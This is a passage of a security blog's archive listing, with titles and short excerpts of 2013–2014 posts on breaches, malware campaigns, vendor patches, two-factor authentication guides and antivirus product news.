a global provider of IT security protection, says BYOI is a welcome change and is the future of authentication in an interconnected world. “With one single service to authenticate, the possibilities to secure it are much better because the consumers have only one - [Apple fixes the SSL bug for MacOSX](https://www.sorinmustaca.com/apple-fixes-the-ssl-bug-for-macosx/) - Following the criticism from the media and security experts, Apple delivered what it promised: a fix to the already famous “goto fail” bug in the SSL implementation in their products. All MacOSX users should update their software accordingly. Make sure you get the 10.9.2 update for MacOSX 10.9 and Security Update 2014-001. Seeing how many fixes - [Apple patches a dangerous SSL bug in iOS](https://www.sorinmustaca.com/apple-patches-a-dangerous-ssl-bug-in-ios/) - Apple released on Friday, February 21st, a software update with version 7.0.6 to fix a security issue in various iOS versions. This security bug allows attackers to act as a man-in-the middle: read and modify the encrypted communication on iPhone, iPad, iPod. The company says it is working also on the fix for OSX. According - [Facebook, WhatsApp and the new Internet bubble](https://www.sorinmustaca.com/facebook-whatsapp-internet-bubble/) - I was reading the great news about the 19 billion USD which Facebook paid for WhatsApp. I want to underline, that 1 year ago, Google wanted to buy it for... 1 billion USD: http://venturebeat.com/2013/04/08/as-google-acquisition-rumors-grow-is-whatsapp-really-worth-a-billion-dollars/ And in December 2013, http://blogs.wsj.com/digits/2013/12/19/whatsapp-hits-400-million-users-wants-to-stay-independent/ WhatsApp has “no plans to sell, IPO, exit, [get new] funding,” Koum said. “Despite the fact that we’re - [Continuous attacks on routers and connected devices](https://www.sorinmustaca.com/continuous-attacks-on-routers-and-connected-devices/) - In the last few months we have been flooded with reports about vulnerability and exploits on Internet connected devices such as routers, house automation devices (light switches), Point of Sale (POS) devices. Let’s briefly review what has happened in this time: AVM’s Fritz.Box The sources in the media report that the patches that AVM, - [Kickstarter hacked, loses control over customer data](https://www.sorinmustaca.com/kickstarter-hacked-loses-control-over-customer-data/) - In an email with the subject “Important Kickstarter Security Notice” sent to all customers, the CEO of the company announced that on Wednesday, Feb 12, 2014, law enforcement officials contacted Kickstarter and alerted them that hackers had sought and gained unauthorized access to some of customers’ data. How come that the law enforcement contacts the company to - [Free Antivirus and Professional Security on Windows 8.1 receive the Virus Bulletin 100% award](https://www.sorinmustaca.com/free-antivirus-and-professional-security-on-windows-8-1-receive-the-virus-bulletin-100-award/) - Virus Bulletin has published the “VB 100% Comparative review on Windows 8.1” and we are happy to announce that Avira Free Antivirus and Avira Professional Security have received the Virus Bulletin 100% award. There is not much to say about the results, except that they are flawless – 100% detection, 0 false positive and a - [Security tips to stay safe on Valentine’s Day](https://www.sorinmustaca.com/security-tips-to-stay-safe-on-valentines-day/) - Tomorrow is Valentine’s Day, and many users, especially men, will be tempted to do some quick shopping or profile checking. Here are a few tips to stay safe when you are in a hurry to shop, chat or research: 1. If a price is too good to be true, most of the time, it is not - [Developments in the cyber attacks and data breaches in the U.S. retail industry](https://www.sorinmustaca.com/developments-cyber-attacks-data-breaches-u-s-retail-industry/) - If there was any doubt that cybercriminals are going especially after easy money, the attack on the "Target" retailer is the best proof of it. In the retail industry in the U.S. people are used to pay with credit cards and this is the perfect place to attack. Nobody thought until now that if one - [Did you know you can opt-out from Google’s targeted ads and tracking?](https://www.sorinmustaca.com/did-you-know-you-can-opt-out-from-googles-targeted-ads-and-tracking/) - Google is generating most of its revenue with Advertisements. On the settings page it says: Ads enable free web services and content. This might be true, but sometimes the ads are just annoying. Here is what you can change in the way Google delivers ads and tracks your behavior on the web. (click to enlarge) From - [Quoted in ECT News : Kaspersky Details Sophisticated 'Mask' Robber Ops](https://www.sorinmustaca.com/quoted-ect-news-kaspersky-details-sophisticated-mask-robber-ops/) - Source: http://www.ectnews.com/story/79959.html Author: Richard Adhikari "After reading the paper, [I believe] it is indeed the most complex piece of malware ever discovered," Sorin Mustaca, an IT security expert at Avira, told TechNewsWorld. - ["Improve your security" completely free today](https://www.sorinmustaca.com/improve-security-completely-free-today/) - As announced in the post "February 11. is the “Safer Internet Day” I give today the book for free. This is to celebrate the Safer Internet Day and to help the readers of my blogs to improve their online and offline security. Enjoy ! - [February 11. is the “Safer Internet Day”](https://www.sorinmustaca.com/february-11-is-the-safer-internet-day/) - Safer Internet Day (SID) is organised by Insafe in February of each year to promote safer and more responsible use of online technology and mobile phones, especially amongst children and young people across the world. Safer Internet Day 2014 is celebrated today, 11. February 2014. The strapline for the campaign is “Let’s create a better - [Security warning for all FRITZ!Box users registered with the MyFRITZ! service](https://www.sorinmustaca.com/security-warning-for-all-fritzbox-users-registered-with-the-myfritz-service/) - AVM, the producer of the well-known home router FRITZ!Box, has issued a security advisory and contacted all users of the cloud service MyFRITZ! to warn them about a potential fraudulent use of telephone services connecting through FRITZ!Box routers. (click to enlarge) According to AVM, it appears that attackers are connecting to the router on the external - [Avira Free Android Security wins perfect score from AV-TEST](https://www.sorinmustaca.com/avira-free-android-security-wins-perfect-score-from-av-test/) - Avira Free Android Security app earned a perfect score and a “Certified” rating from AV-TEST. Avira Free Android Security scored a perfect 13 out of 13 points in AV-TEST’s January 2014 Android Mobile Security Test, which reviewed 30 different products on their performance, detection rates, protection from malware and overall product usability. Avira Free Android Security automatically scans the user’s - [Survey: how many emails addresses do you have for private use?](https://www.sorinmustaca.com/survey-emails-addresses-private-use/) - I am curious how many email addresses you have and use for private use. I have also a field which says "I use MaskMe or similar" which means that you create disposable email addresses. I need the data for a paper I am writing. - ["Want more fans for your page ?" Tempting, isn't it?](https://www.sorinmustaca.com/want-fans-page-tempting-it/) - I received a spam with an advertising for the Facebook page IT Security News: Nothing special, but the two things drew my attention: - The picture was hosted by McAfee URL shortner: mcaf.ee - The prices for the followers were different. Want more fans on your page It Security News ? Get more fans with - [Avira Free Mac Security – Update 2 released](https://www.sorinmustaca.com/avira-free-mac-security-update-2-released/) - We released this week the Update 2 of the Avira Free Mac Security for MacOSX 10.8 and 10.9. This update adds a long awaited feature: turn real-time protection ON and OFF. The functionality is available from the tray bar and the programs bar In order to protect your security better, it is required - [When the Internet fails on you - IFTTT.com failure](https://www.sorinmustaca.com/internet-fails-ifttt-com-failure/) - My entire automatic posting on ITSecurityNews.info which is retweeted on @ITSecurityNews, @SorinMustaca and @sorinm_security is built on IFTTT.com. Well, this is why you didn't get some tweets on time: Last night at approximately 10:00pm PST much of the work IFTTT does in the background stopped due to an issue with one of our backend services. Our monitoring - [Some thoughts about the spam attack sent through InternetOfThings (Proofpoint)](https://www.sorinmustaca.com/thoughts-spam-attack-internetofthings-proofpoint/) - http://www.proofpoint.com/about-us/press-releases/01162014.php More than 750,000 Phishing and SPAM emails Launched from "Thingbots" Including Televisions, Fridge Note: An article about this has been published by Richard Adhikari in TechNewsWorld. A general comment on the entire story. Security researchers usually use spamtraps (an email address that receive nothing else than pure spam) to collect these emails and - [BSI launched a service to check if your online credentials were compromised](https://www.sorinmustaca.com/bsi-launched-a-service-to-check-if-your-online-credentials-were-compromised/) - Germany’s Federal Office for Information Security (BSI) warns that cybercriminals have compromised around 16 million email addresses of online accounts. They launched a service to help users find out if their credentials have been stolen: http://bit.ly/1eiR7p7 (in German) After you submit, you see in a second window a code which is going to be present in - [Quoted in TechNewsWorld: Beware of the Spam-Sending Fridge](https://www.sorinmustaca.com/quoted-technewsworld-beware-spam-sending-fridge/) - Source: http://www.technewsworld.com/story/79828.html Author: Richard Adhikari "I don't think any security software company is able to detect such a small amount of emails that have little or no characteristics in common," Sorin Mustaca, an IT security expert atAvira, told the E-Commerce Times. Considerable work, including deep analysis, is required to identify the device sending out spam, - [Protect individuals and their devices within an organisation, not just their desktops](https://www.sorinmustaca.com/protect-individuals-devices-organisation-desktops/) - The classic approach to secure a company is to secure its assets against all attack vectors: laptops, workstations, servers, storage entities and programmes. The standard attack methods are usually: infections through files carried on USB sticks, memory cards, mobile hard drives, downloaded files network attacks (spoofing, DOS) vulnerabilities that get exploited in common software - [Quoted in ComputerWeekly.com: Enterprise can learn from small business security, says Avira](https://www.sorinmustaca.com/quoted-computerweekly-com-enterprise-learn-small-business-security-avira/) - Enterprise can learn from small business security, says Avira Author: Warwick Ashford Friday 17 January 2014 15:10 Businesses need to rethink their approach to security and focus on people, not technology, in the face of IT consumerisation, says security firm Avira. This approach is working for small companies that are forced to trust and empower their employees due - [Duplicati: How to create your own secure online backup for free](https://www.sorinmustaca.com/duplicati/) - One thing that almost all online backup solutions (e.g.. Dropbox, CX, Memopal, etc.) have in common is that they don’t allow the user to store encrypted files on their storage. They encrypt the connection from user’s computer to the cloud service, but once the files are there, they will be stored either unencrypted or encrypted - [Avira PC Cleaner – a second opinion scanner](https://www.sorinmustaca.com/avira-pc-cleaner-a-second-opinion-scanner/) - The PC Cleaner is a scanner which can be used in parallel with other antimalware products. It is created for users of other security products that think that they might have a malware infection which their security solution doesn’t detect. It works on any PC, note- or netbooks with operating system Windows XP SP3 and above. It - [How to check if you were affected by the malware delivered by Yahoo’s ads in Europe](https://www.sorinmustaca.com/how-to-check-if-you-were-affected-by-the-malware-delivered-by-yahoos-ads-in-europe/) - You might have heard of the incident that shadowed the beginning of the year for Yahoo. If you visited Yahoo during December 6th, 2013 and January 3rd, 2014 then it is best that you read on this article until the end. An estimated 2.5 million Yahoo users were likely infected with malicious software, after hackers hijacked some - [IT Security Myths on Improve-Your-Security.org](https://www.sorinmustaca.com/security-myths-improve-your-security-org/) - You surely know of my free eBook "Improve Your Security" available here. I started to publish there a series of IT Security myths which will make you say "Oh, SHIT!!!" Here they are: http://improve-your-security.org/category/myths/ These are the first three: Most victims of malware often think, “This can never happen to me. Our network is secure, - [Information security in the Social Media age](https://www.sorinmustaca.com/information-security-social-media-age/) - A company doesn’t exist anymore if it is not present on at least a few social media platforms. Depending on the area they are active, they could go for average consumer or for highly skilled professionals. In order to address their customers, they need to use one or another social media platform. However, the tendency - [Protect yourself and all your devices against aggressive advertisements for FREE](https://www.sorinmustaca.com/protect-devices-aggressive-advertisements-free/) - There is a lot of money being spent in the IT industry on analytics and on detailed information on users and their behavior online. There is nothing wrong in wanting to know who your users are and what they want in order to serve them better and with less hassle for them. But, the border - [Protect yourself and all your devices against tracking for FREE](https://www.sorinmustaca.com/protect-devices-tracking-free/) - This is the second post on how to protect yourself, following the one about how to "Protect yourself and all your devices against ads for FREE". Tracking via cookies The idea behind tracking is actually a good one. Imagine that you search on Amazon for "hard drive 500 gb". This website drops a cookie in - [Three key security threats seen during 2013 – and how to protect against them](https://www.sorinmustaca.com/key-security-threats-2013-protect/) - Originally published here: http://grahamcluley.com/2013/12/three-key-security-threats/ 1. Security breaches and hacks 2013 was the year that major security breaches and hacks really took hold. Millions of credentials were stolen from the likes of Twitter, Tumblr,Yahoo, Adobe and many others. Whenever data breaches like this occur, targeted attacks against the users of such wesbites can quickly follow. The targeted attacks usually consist - [Improve your security: Online Protection](https://www.sorinmustaca.com/improve-your-security-online-protection/) - It is usually said that those who are behind a hardware router are protected from any danger. This is true in regard to the connections that come from outside but it is not true for the dangers which come from inside the local network. We must not forget that most of threats are landing on - [Improve your security: Securing your notebook](https://www.sorinmustaca.com/improve-your-security-securing-your-notebook/) - Quite a lot of people take now their netbook or smartphone with them when travelling. Because of this, almost every quarter of the year we read stories about sensitive personal data was lost because some laptop or USB stick got stolen. Moreover, with the rise of the mobile devices like smartphones, tablets and pads, anyone - [Improve your security: We have a Facebook Page](https://www.sorinmustaca.com/improve-your-security-we-have-a-facebook-page/) - Finally, I managed to create a Facebook page for the book: www.facebook.com/ImproveYourSec Why “Sec” and not “Security” ? Well, I don’t know… Facebook appears to block anything which contains the word “security” in it. Hey, Facebook, are you afraid of some competition? from Improve Your SecurityImprove Your Security http://improve-your-security.org/2013/12/20/facebook-page/ via improve-your-security.org Get the free eBook from - [Apple released the update v10.9.1 for OS X Mavericks](https://www.sorinmustaca.com/apple-released-the-update-v10-9-1-for-os-x-mavericks/) - Apple published an update to their latest OS X, Mavericks v10.9, which is recommended for all OS X users. It improves the stability, compatibility, and security and includes: Improved support for Gmail in OS X Mail, and fixes for users with custom Gmail settings Improves the reliability of Smart Mailboxes and search in Mail Fixes an issue - [Improve your security: Update your software often](https://www.sorinmustaca.com/improve-your-security-update-your-software-often/) - Every week or even day we see new vulnerabilities popping up in all software packages which we use daily: In the operating system (Windows, Mac, Linux), PDF Readers, Web browsers, Mail clients, Office suites, and so on. It is critical to install the available updates for all these software packages in order to not become - [Improve your security: Password protect your smartphone](https://www.sorinmustaca.com/improve-your-security-password-protect-your-smartphone/) - A recent study published in various online magazines showed that more and more people tend to replace their traditional mobile phones with smartphones. This trend applies not only to young people who are usually more interested in new technologies but also to older people. So, what does this has to do with security? A smartphone - [Quoted in Softpedia.com: NSA: Foreign Country Developed BIOS Malware Designed to Destroy Computers](https://www.sorinmustaca.com/quoted-softpedia-com-nsa-foreign-country-developed-bios-malware-designed-destroy-computers/) - http://news.softpedia.com/news/NSA-Says-Foreign-Country-Developed-BIOS-Malware-Capable-of-Destroying-Computers-409446.shtml However, the story seems to be a bit exaggerated. Taking control of computers might be a plausible goal, but destroying them seems a bit farfetched. Avira Security Expert and Product Manager Sorin Mustaca agrees. “Regarding the so-called ‘BIOS Plot,’ I think it is just a smart tactic to direct the attention from the real - [Improve your security: Change the default passwords](https://www.sorinmustaca.com/improve-your-security-change-the-default-passwords/) - Very often people buy new gadgets or devices which because they are “secured” out of the box. Or, better said, this is what the producers write on their boxes, because the reality is quite different. These devices are delivered most of the time with default passwords like “0000″, “admin”, “1234″ and so on. This is not - [Improve your security: Create good passwords](https://www.sorinmustaca.com/improve-your-security-create-good-passwords/) - I never thought that I am going to write this post after publishing the two other Improve your security articles about passwords: #8: change the default passwords and #1: complex passwords aren’t always better But, here we are, after seeing three major websites (LinkedIn, LastFM, eHarmony)…Read more → from Improve Your Security http://improve-your-security.org/2013/12/06/create-good-passwords/ via improve-your-security.org Get the free eBook from here - [Improve your security: “Improve your Security” mentioned on Adotas.com](https://www.sorinmustaca.com/improve-your-security-improve-your-security-mentioned-on-adotas-com/) - In an interview for the magazine http://www.adotas.com I published a reference to the book: I published a free eBook exactly to help these people to understand the risks and to teach them how to make their accounts and devices…Read more → from Improve Your Security http://improve-your-security.org/2013/12/05/improve-security-mentioned-adotas-com/ via improve-your-security.org Get the free eBook from here - [Quoted on Adotas.com: Today’s Burning Question: Massive Hack Attack Reaction](https://www.sorinmustaca.com/quoted-adotas-com-todays-burning-question-massive-hack-attack-reaction/) - http://www.adotas.com/2013/12/todays-burning-question-massive-hack-attack-reaction/ “According to the article [on CNN’s website], the accounts details that were leaked were obtained using keyloggers installed on end users’ computers. No networks were breached in order to obtain the information, which is good on one side, but it is worrisome on the other. This also gives us a pretty good view on - [Improve your security: How to combat the brute force attacks on WordPress blogs](https://www.sorinmustaca.com/improve-your-security-how-to-combat-the-brute-force-attacks-on-wordpress-blogs/) - We wrote 1.5 months ago in the article Botnet attack on WordPress about the ongoing distributed attack on the WordPress platform. WordPress has a default administrator called “admin” which can be changed to any user upon installation. According to various sources, the…Read more → from Improve Your Security http://improve-your-security.org/2013/12/04/combat-brute-force-attacks-wordpress-blogs/ via improve-your-security.org Get the free eBook from here - [Quoted in USA Today: Black Friday scams](https://www.sorinmustaca.com/quoted-in-usa-today-black-friday-scams/) - Source of the article: http://sorin-mustaca.com/2013/11/15/black-friday-is-coming-stay-alert/ The article in USA Today online and printed edition: Cybergrinches stalking shoppers "All these things have something in common: social engineering and greed," says Sorin Mustaca, security analyst at anti-malware firm Avira. - [The sad state of Java security](https://www.sorinmustaca.com/the-sad-state-of-java-security-2/) - The problem of Oracle is that they bought a technology that was stretched out to be actually “write once, run everywhere”. The Virtual Machine that provides this functionality had to be ported to all devices, and lately (in the past few years) also on mobile devices. As written in the news, even if the “run everywhere” - [HowTo: mount a USB hdd in Debian and share it for all users without authentication](https://www.sorinmustaca.com/howto-mount-a-usb-hdd-in-debian-and-share-it-for-all-users-without-authentication/) - All these I needed to do on my RaspberryPI so that I can share a mounted USB drive to the entire network and to be accessible fully without any authentication. I know, not very smart, but try to configure a TV, 2 iPads, 1 iPhone, 1 Android and one Internet radio to access it. - [Softpedia published a review of "Improve your security"](https://www.sorinmustaca.com/softpedia-published-a-review-of-improve-your-security/) - Source: http://news.softpedia.com/news/Free-eBook-on-How-to-Improve-Your-Security-402734.shtml Author: Eduard Kovacs If you want to learn all there is to know about protecting your devices and online accounts against cybercriminals, we recommend that you check out “Improve Your Security,” a free eBook published by Avira Security Expert and Product Manager Sorin Mustaca. These days, cybercriminals aren’t only after our computers’ resources - [Bitcasa infinite storage: the anatomy of a failure](https://www.sorinmustaca.com/bitcasa-infinite-storage-the-anatomy-of-a-failure/) - I have to admit that I was greedy ... I mean, there is nobody in the market promising Infinite storage as a hard drive in the cloud that never runs out of space. Hell, this is better than any hard drive ! So, I gave it a try... more than 1.5 years ago: Member Since March 5, 2012 - [What to do to stop phone and mail advertisements](https://www.sorinmustaca.com/what-to-do-to-stop-phone-and-mail-advertisements/) - The Christmas presents frenzy is starting during this time of year all over the world. Most of the shops are making the equivalent of their year to date revenue in these weeks before Christmas. So, it makes sense for them to have a good planned online advertisement strategy. This is the reason why you are - [About cyber attacks](https://www.sorinmustaca.com/about-cyber-attacks/) - Do you think that the cyberattacks have increased these last months/years? The cyberattacks have definitely increased in the last years, but not only that. The attacks have become more like a business. It is possible now to purchase a cyberattack against an organization (the entire network), against websites and social media accounts. The cybercriminals - [Black Friday is coming – stay alert](https://www.sorinmustaca.com/black-friday-is-coming-stay-alert/) - Every year, in the last week of November we have the Black Friday (November 29th) madness of buying at reduced prices. “Stay alert” doesn’t mean that you should only keep an eye on those great offers. It means that you should not fall for the scams that are going to show up. What is going to happen? We expect - [5 tips to keep your mobile devices safe while using 3/4G and LTE](https://www.sorinmustaca.com/5-tips-to-keep-your-mobile-devices-safe-while-using-34g-and-lte/) - Having tablets and smartphones dominating the market has been the main motivation for IT companies to boost the 3/4G and LTE technologies. This will significantly improve user connectivity but also will raise the risks levels in terms of security. These new technologies require that we have to pay more attention to our terminals in order to - [Ransomware in the wild: the CryptoLocker malware](https://www.sorinmustaca.com/ransomware-in-the-wild-the-cryptolocker-malware/) - The Cryptolocker is a new variant of ransomware malware that encrypts various files on user’s computer and demands the owner of the computer to pay the malware authors in order to decrypt the files. The affected files are documents, images, databases and many others. How to recognize it The CryptoLocker malware files are mostly - [What to do if your computer has a virus](https://www.sorinmustaca.com/what-to-do-if-your-computer-has-a-virus/) - So, the unthinkable, the only thing which you always thought that it can’t happen to you did happen: your computer got a virus or more. What to do now? First of all, don’t be scared and think well before taking the next steps. Many people format first their computer and reinstall the operating system or even - [Quoted in Focus Magazine MY: SMEs in the crosshairs](https://www.sorinmustaca.com/quoted-in-focus-magazine-my-smes-in-the-crosshairs/) - Remember this post: http://sorin-mustaca.com/2013/07/03/about-the-internet-threat-landscape-and-why-small-businesses-are-the-most-vulnerable/ ? I almost forgot about it... Until today. I received the PDF version of the final article: FocusM-MY "SMEs are generally easier to attack than larger corporations", says Mustaca I've been quoted quite a lot of times... - [The sad state of Java security](https://www.sorinmustaca.com/the-sad-state-of-java-security/) - I wrote many times about Java, their vulnerabilities, how to disable it... Just search in this blog for the term Java. I've been asked many times why do I think that we are seeing these zero day vulnerabilities. The problem The problem of Oracle is that they bought a technology that was - [Advanced Real-Time protection with Avira Protection Cloud](https://www.sorinmustaca.com/advanced-real-time-protection-with-avira-protection-cloud/) - The malware landscape is evolving on a very rapid pace and these days, the technologies released 2 or 3 years ago are becoming slowly obsolete. That’s why providing security only through engine and signature updates is no longer considered enough. In order to ensure that our customers are using the best protection available, we released - [Quoted in elconfidencial.com about security of Android and iOS](https://www.sorinmustaca.com/quoted-in-elconfidencial-com-about-security-of-android-and-ios/) - Elconfidencial.com http://www.elconfidencial.com/tecnologia/2013-10-11/en-materia-de-seguridad-con-cual-me-quedo-android-o-ios_39710/ En materia de seguridad, ¿con cuál me quedo? ¿Android o iOS? (Interviene Sorin Mustaka, experto en seguridad IT de Avira) “”No mobile platform is fully secure as both are almost closed to security software developers. The cybercriminals have no ethical barriers when it comes to develop - [Notifier gone. What’s next? Avira releases version 2014 of all products](https://www.sorinmustaca.com/notifier-gone-whats-next-avira-releases-version-2014-of-all-products/) - Last week we surprised more than a few people by ending our long-running ‘Notifier’ ads in Avira’s Free Antivirus. We also announced our first-ever security product for Apple iPhones and iPads. And, as rumors have already circulated, we’re currently testing a new feature code-named ‘Avira Dashboard’ So what’s going on? It’s part of Avira’s new - [Protect business information outside your organisation](https://www.sorinmustaca.com/protect-business-information-outside-your-organisation/) - Credits:http://cybersecuritymonth.eu/press-campaign-toolbox/ecsm-material/business-information European Cyber Security Month an EU advocacy campaign that takes place in October Protect business information outside your organisation Ensure you keep sensitive information secure: When you are outside your organisation, ensure you keep sensitive information and equipment secure at all times to prevent theft or loss. In particular when you are in public - [Adobe hacked: lost source code and millions of user credentials](https://www.sorinmustaca.com/adobe-hacked-lost-source-code-and-millions-of-user-credentials/) - In a blog post published two days ago, Adobe Inc., the publisher of Adobe Acrobat, Coldfusion and many, many other titles, has reported that their infrastructure was hacked and source code of several products was stolen. The breach has been discovered by the researcher Brian Krebs and by the audit company Hold Security LLC. Additionally, the company said - [Protect your personal information and identity](https://www.sorinmustaca.com/protect-your-personal-information-and-identity/) - Credits:http://cybersecuritymonth.eu/press-campaign-toolbox/ecsm-material/personal-information-identity European Cyber Security Month an EU advocacy campaign that takes place in October Protect your personal information and identity Use a strong password: Your password is the equivalent of the lock and key to your house on the Internet. Passwords are a major defence, and developing good password practices will help keep your sensitive - [Protect your personal computer (PC) and portable devices](https://www.sorinmustaca.com/protect-your-personal-computer-pc-and-portable-devices/) - Credits: http://cybersecuritymonth.eu/press-campaign-toolbox/ecsm-material/pc-portable-devices European Cyber Security Month an EU advocacy campaign that takes place in October Protect your personal computer (PC) and portable devices PC Use a firewall: Firewalls protect your network some viruses and hackers Install anti-virus software: Anti-virus software prevents virus infections from spreading on your computer Get the latest security updates: - [How many Certified Secure Software Lifecycle Professionals are out there?](https://www.sorinmustaca.com/how-many-certified-secure-software-lifecycle-professionals-are-out-there/) - As of September 25 2013: 1168 CSSLP in the entire world (you have to sum them up from that table) https://www.isc2.org/member-counts.aspx# It is an honour to be one of them. :) And this since one year and a half (Mai 2012). Some interesting statistics from that table: Romania 1 Germany 19 - [When the mail services deliver dangerous packages](https://www.sorinmustaca.com/when-the-mail-services-deliver-dangerous-packages/) - We are monitoring a spam campaign that is using the names of delivery services like FedEx and DHL to send the receiver to a website that installs malware. With subjects like “Not possible to make delivery” or “Shipping service”, the emails make heavy use of social engineering by creating a sense of emergency in order - [Quoted on CSOOnline.com : Zscaler finds a 'big number' of Google Play apps with overly aggressive adware](https://www.sorinmustaca.com/quoted-on-csoonline-com-zscaler-finds-a-big-number-of-google-play-apps-with-overly-aggressive-adware/) - Source Article. Zscaler finds a 'big number' of Google Play apps with overly aggressive adware Google did not respond to a request for comment, but Sorin Mustaca, data security expert for AV vendor Avira, said Google has been working with AV companies since buying VirusTotal. The collaboration has focused on detecting suspicious apps on Google Play as - [Facebook enables https per default to all users](https://www.sorinmustaca.com/facebook-enables-https-per-default-to-all-users/) - Finally, after two years from the first release of the feature and hoping that the users will switch to https, Facebook enforces now https to all users by default. This feature means that your browser is told to communicate with Facebook using a secure connection, as indicated by the “https” rather than “http” in https://www.facebook.com. This uses Transport - [Mentioned in the (ISC)2 Newsletter for Europa](https://www.sorinmustaca.com/mentioned-in-the-isc2-newsletter-for-europa/) - After publishing the article in Security Insider under the shield of (ISC)2, I was surprized to see in the monthly newsletter a reference to the article. Source: Security Insider (HTML, PDF) Originally published in English: (ISC)2 Blog Republished in this blog: http://sorin-mustaca.com/2013/05/29/security-for-free/ "News and Events in your region" Zahlt kostenlose Sicherheit - [The three most common web based attacks and how to protect against them](https://www.sorinmustaca.com/the-three-most-common-web-based-attacks-and-how-to-protect-against-them/) - Cybercriminals increasingly are attacking enterprises at their weakest point: the end user device. New forms of malware and social engineering attacks threaten your users every day, and even more so as they expand their use of Web-based applications. 1. Drive-by downloads. Users are visiting known websites that have a good reputation and don’t even think that it - [Improve your security #17 : How to secure a new computer in 10 steps](https://www.sorinmustaca.com/improve-your-security-17-how-to-secure-a-new-computer-in-10-steps/) - Did you just buy a computer and wonder how can you make it secure? Here are some steps which you can follow to make this computer really yours. Really yours means that you can start using it and storing personal information on it without having to be afraid of someone snooping in it. 1. (Re)Install - [The biggest threats in the mobile world: social engineering and malicious apps](https://www.sorinmustaca.com/the-biggest-threats-in-the-mobile-world-social-engineering-and-malicious-apps/) - The growth of the smart devices (smartphones, iPhones, tablets, intelligent TVs and so on) brought not only joy to the owners. The average consumer of these devices is not security aware. He will try any software and will take any offer, even those which sound too good to be true. 1. The biggest threat for - [Patches for Microsoft and Adobe address several security vulnerabilities](https://www.sorinmustaca.com/patches-for-microsoft-and-adobe-address-several-security-vulnerabilities/) - Microsoft and Adobe released this week plenty of patches for their software. Microsoft released as planned the MS13-052 to 058 bulletins which resolve six critical vulnerabilities in Microsoft software. The most severe vulnerability could allow remote code execution if a user views shared content that embeds TrueType font files. An attacker who successfully exploited this vulnerability could - [Upgrade of older consumer products to Version 2013](https://www.sorinmustaca.com/upgrade-of-older-consumer-products-to-version-2013/) - The malware landscape is evolving on a very rapid pace and these days, the technologies released 2 or 3 years ago are becoming slowly obsolete. That’s why providing security only through engine and signature updates is no longer considered enough. In order to ensure that our customers are using the best protection available, we released - [Security for Free ? Die Deutsche Edition.](https://www.sorinmustaca.com/security-for-free-die-deutsche-edition/) - Source: Security Insider (HTML, PDF) Originally published in English: (ISC)2 Blog Republished in this blog: http://sorin-mustaca.com/2013/05/29/security-for-free/ Wer sein Augenmerk nur auf die Anschaffungskosten einer Sicherheitslösung richtet, zahlt oft an anderer Stelle. (Bild: Archiv) Malware, Hacking-Attacken, Software-Schwachstellen: Ist es angesichts der ausufernden Bedrohungslandschaft überhaupt möglich, sich mit Security-Tools für lau umfassend abzusichern? In diesem Beitrag - [About the Internet threat landscape, and why small businesses are the most vulnerable](https://www.sorinmustaca.com/about-the-internet-threat-landscape-and-why-small-businesses-are-the-most-vulnerable/) - 1) Tell me a bit about the Internet threat landscape, and why small businesses are the most vulnerable? The Internet threat landscape is pretty complex these days. We see more and more targeted attacks against large and small companies which happen via phishing, DDoS, exploits of known vulnerabilities and social engineering. The small businesses are - [Ubisoft breached, users asked to reset passwords](https://www.sorinmustaca.com/ubisoft-breached-users-asked-to-reset-passwords/) - If you’re a Ubisoft customer, you probably wondered why you are being asked to reset your password. Ubisoft is now part of the “big family” of prominent websites that got hacked and lost customer data: LinkedIn, eHarmony, LastFM and others. In a post called “SECURITY UPDATE REGARDING YOUR UBISOFT ACCOUNT – PLEASE CREATE A NEW - [Opera.com hacked, distributed malware signed with their certificate to probably thousand of users](https://www.sorinmustaca.com/opera-com-hacked-distributed-malware-signed-with-their-certificate-to-probably-thousand-of-users/) - According to a post on the Opera Security Blog, the company suffered on June 19th “a targeted attack on internal network infrastructure”. The attackers were able to obtain at least one old and expired Opera code signing certificate, which they have used to sign some malware. This has allowed them to distribute malicious software which incorrectly - [Improve your security #16: Encrypt your data](https://www.sorinmustaca.com/improve-your-security-16-encrypt-your-data/) - The best way to protect your data is to use encryption. Encryption is is the process of encoding messages (or information) in such a way that eavesdroppers or hackers cannot read it, but that authorized parties can. [check Wikipedia for more details]. Applied to files, this means that each file is encrypted in such a way that - [We’ve heard you: Goodbye “Expert mode” !](https://www.sorinmustaca.com/weve-heard-you-goodbye-expert-mode/) - Some years ago, it was common practice to hide options that are most likely not going to be used by everyone. This is how the few advanced options were kept away from the what we call “average user” and made available only to tech-savvy users. On the product’s side, the further development of the technology - [Facebook likejacking scam via Twitter](https://www.sorinmustaca.com/facebook-likejacking-scam-via-twitter/) - The tweet your receive is ”we are looking for twitter members to try our brand new product at twitgiveaway,com”, mostly as a reply to one of your tweets. There is no mistake in the URL: “twitgiveaway,com”. There is indeed a comma there instead of a dot. The reason for this is that the fraudsters are trying - [OWASP Top 10 Project 2013 published](https://www.sorinmustaca.com/owasp-top-10-project-2013-published/) - The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. As a leading security software vendor, Avira - [5 signs you’ll notice if your social media account has been hacked](https://www.sorinmustaca.com/5-signs-youll-notice-if-your-social-media-account-has-been-hacked/) - We wrote in the article How to protect your social media account 10 tips how to protect your account. But … do you know if your account has been hacked? Here are some tips which can give you a pretty clear indication that your account has been hacked: 1. You notice posts that your account - [How to enable two-factor authentication for LinkedIn](https://www.sorinmustaca.com/how-to-enable-two-factor-authentication-for-linkedin/) - More and more social media websites and not only are enabling two-factor authentication in order to secure their users better. Following Google, Facebook, Dropbox, Twitter, Microsoft now also the biggest professional network website LinkedIn has introduced two-factor authentication. Here is how to enable it in a few steps. 1. Go to your account and choose - [Security “for free”?](https://www.sorinmustaca.com/security-for-free/) - As security professionals, we are continuously facing the challenge of smaller and smaller budgets allocated to maintain and improve the IT security. That’s probably the main reason why there is always the temptation of “Free”. Many people, sometimes even professionals, think that they can achieve a good security for free. “For free” means in this - [How to enable two-factor authentication for Twitter](https://www.sorinmustaca.com/how-to-enable-two-factor-authentication-for-twitter/) - Not a week passes without seeing in the press that some Twitter account have been hacked (as in used without authorization). Twitter tried to create more awareness about creating secure passwords and educating the users to not fall for the classical social engineering techniques. But, with over 200 million users, it is close to impossible - [Emails containing fake invoices from Zalando and Deutsche Bahn distribute malware](https://www.sorinmustaca.com/emails-containing-fake-invoices-from-zalando-and-deutsche-bahn-distribute-malware/) - We wrote before about the smart methods of fooling users to do things (execute files) which they would not normally do. Two weeks ago we’ve seen a mass mailing in the German language containing malicious payload pretending to be invoices from Apple 